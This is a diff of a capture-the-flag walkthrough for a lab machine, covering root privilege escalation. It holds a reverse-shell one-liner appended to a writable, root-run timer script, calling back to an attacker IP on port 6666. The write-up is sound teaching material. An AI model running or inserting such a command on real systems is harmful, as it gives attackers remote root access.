Dood3/walkthrough-s-/minotaur.md

 ![PIC_REV2](https://user-images.githubusercontent.com/93183445/140651333-9964013c-007a-45ff-b3f1-e1d662fa0927.png)

 After running linpeas.sh and searching around for a bit, I got a tip.
+Remember the content of one of the files we
+found in the ftp earlier.
+There a timer is mentioned (didn't make the connection, I got a tip..).
-There's a file in the root directory\
-that we can write to.
+There's a file in the root directory that we can write to.
 Plus it is owned by root..
 So let's abuse that and pack a rev-shell in that very file :)

 ![PIC_REV3](https://user-images.githubusercontent.com/93183445/140651338-c8f5a0cf-5939-4dac-ab46-d50150fe698f.png)

-<code>echo 'sh -i >& /dev/tcp/<IP>/6666 0>&1' >> timer.sh</code>
+<code>echo 'sh -i >& /dev/tcp/YOUR-IP/6666 0>&1' >> timer.sh</code>

 Start another listener and it will connect without any further doing.
 Now you're root _tataaaa_ \
 So let's go and get the final flag in the /root directory: